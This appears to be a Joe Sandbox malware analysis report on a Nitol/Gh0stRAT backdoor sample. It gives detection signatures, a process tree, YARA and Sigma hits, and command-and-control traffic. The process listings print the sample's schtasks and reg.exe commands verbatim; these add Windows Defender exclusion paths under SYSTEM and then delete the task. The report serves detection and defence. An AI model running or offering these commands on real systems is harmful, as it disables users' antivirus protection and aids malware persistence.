Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
45631.exe

Overview

General Information

Sample name:45631.exe
Analysis ID:1583301
MD5:71fb431d4793bb51ce762dc5d719a730
SHA1:39fcda8ec8c9e472e2c133cf767e1a4b5a00d01f
SHA256:01c7b434e25b639bed532929cfeac6b4da4d7e9a07cdd0e9f3c93573191865e5
Tags:backdoorexeuser-zhuzhu0009
Infos:

Detection

Nitol
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Nitol
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Creates an undocumented autostart registry key
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • 45631.exe (PID: 1656 cmdline: "C:\Users\user\Desktop\45631.exe" MD5: 71FB431D4793BB51CE762DC5D719A730)
  • sgH8Ps.exe (PID: 4920 cmdline: C:\Users\user\Documents\sgH8Ps.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • sgH8Ps.exe (PID: 6196 cmdline: C:\Users\user\Documents\sgH8Ps.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
    • cmd.exe (PID: 4548 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6980 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3428 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 508 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 4000 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2572 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6136 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6688 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 4780 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6532 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2760 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3404 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 1484 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1488 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6816 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 4036 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • Twhtlb.exe (PID: 3744 cmdline: "C:\Program Files (x86)\Twhtlb\Twhtlb.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
      • cmd.exe (PID: 1732 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6352 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 2656 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 1436 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 6404 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 5352 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 6780 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 1012 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 6820 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • Twhtlb.exe (PID: 1224 cmdline: "C:\Program Files (x86)\Twhtlb\Twhtlb.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • 6WWeC.exe (PID: 1124 cmdline: "C:\Program Files (x86)\K5YQV85\6WWeC.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • Twhtlb.exe (PID: 5692 cmdline: "C:\Program Files (x86)\Twhtlb\Twhtlb.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • Twhtlb.exe (PID: 4908 cmdline: "C:\Program Files (x86)\Twhtlb\Twhtlb.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • 6WWeC.exe (PID: 2456 cmdline: "C:\Program Files (x86)\K5YQV85\6WWeC.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
    00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
      Process Memory Space: Twhtlb.exe PID: 3744JoeSecurity_NitolYara detected NitolJoe Security
        Process Memory Space: Twhtlb.exe PID: 3744PlugXStringsPlugX Identifying StringsSeth Hardy
        • 0x101bd:$Dwork: d:\work
        • 0x3d020:$Dwork: d:\work
        • 0x9d6fc:$Dwork: d:\work
        • 0xc45d6:$Shell6: Shell6
        • 0xc53b5:$Shell6: Shell6
        SourceRuleDescriptionAuthorStrings
        40.2.Twhtlb.exe.2d603e8.3.raw.unpackJoeSecurity_NitolYara detected NitolJoe Security
          40.2.Twhtlb.exe.10000000.8.unpackJoeSecurity_NitolYara detected NitolJoe Security
            40.2.Twhtlb.exe.2d603e8.3.unpackJoeSecurity_NitolYara detected NitolJoe Security
              6.2.sgH8Ps.exe.27e0000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
              • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
              40.2.Twhtlb.exe.3a40000.5.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
              • 0x221dd:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x2225b:$e2: Add-MpPreference -ExclusionPath

              System Summary

              barindex
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\sgH8Ps.exe, ParentImage: C:\Users\user\Documents\sgH8Ps.exe, ParentProcessId: 6196, ParentProcessName: sgH8Ps.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 4548, ProcessName: cmd.exe
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\sgH8Ps.exe, ParentImage: C:\Users\user\Documents\sgH8Ps.exe, ParentProcessId: 6196, ParentProcessName: sgH8Ps.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 4548, ProcessName: cmd.exe
              Source: Process startedAuthor: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6352, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 2656, ProcessName: reg.exe
              Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 2656, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-02T12:15:54.006747+010028529011Malware Command and Control Activity Detected192.168.2.6499998.217.152.2408917TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 45631.exeAvira: detected
              Source: C:\Program Files (x86)\K5YQV85\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
              Source: C:\Program Files (x86)\Twhtlb\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
              Source: 45631.exeVirustotal: Detection: 37%Perma Link
              Source: 45631.exeReversingLabs: Detection: 28%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Program Files (x86)\K5YQV85\tbcore3U.dllJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Twhtlb\tbcore3U.dllJoe Sandbox ML: detected

              Compliance

              barindex
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeUnpacked PE file: 40.2.Twhtlb.exe.5300000.7.unpack
              Source: unknownHTTPS traffic detected: 39.103.20.59:443 -> 192.168.2.6:49946 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.6:49991 version: TLS 1.2
              Source: Binary string: d:\depot\ca\EasyDMS\7.10_REL_ntamd64\src\optu\ntamd64\EasyDmsStart.pdb source: 45631.exe
              Source: Binary string: d:\depot\ca\EasyDMS\7.10_REL_ntamd64\src\optu\ntamd64\EasyDmsStart.pdb source: 45631.exe
              Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: Twhtlb.exe, 00000028.00000002.3979563135.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 00000028.00000000.3611622084.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 00000028.00000002.3979769502.000000000115E000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000029.00000002.3648686550.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 00000029.00000000.3638122049.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, 6WWeC.exe, 0000002A.00000000.3641345339.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, 6WWeC.exe, 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, Twhtlb.exe, 0000002D.00000000.3651208728.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 0000002D.00000002.3663827299.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 0000002E.00000002.3756389310.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 0000002E.00000000.3747948848.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, 6WWeC.exe, 0000002F.00000002.3764008827.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, 6WWeC.exe, 0000002F.00000000.3751219420.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, 6WWeC.exe.40.dr
              Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
              Source: Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: sgH8Ps.exe, 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmp, sgH8Ps.exe, 00000006.00000000.2757387672.0000000140014000.00000002.00000001.01000000.00000008.sdmp, sgH8Ps.exe, 00000007.00000000.3147439412.0000000140014000.00000002.00000001.01000000.00000008.sdmp, sgH8Ps.exe.0.dr

              Change of critical system settings

              barindex
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramDataJump to behavior
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\UsersJump to behavior
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)Jump to behavior
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\DocumentsJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00007FFDA55DA1B8 FindFirstFileExW,6_2_00007FFDA55DA1B8
              Source: C:\Users\user\Documents\sgH8Ps.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DFFE
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DDFF
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]6_2_0000000140011270
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DE96
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DEFB
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000E178
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DDD9

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.6:49999 -> 8.217.152.240:8917
              Source: global trafficTCP traffic: 192.168.2.6:49999 -> 8.217.152.240:8917
              Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
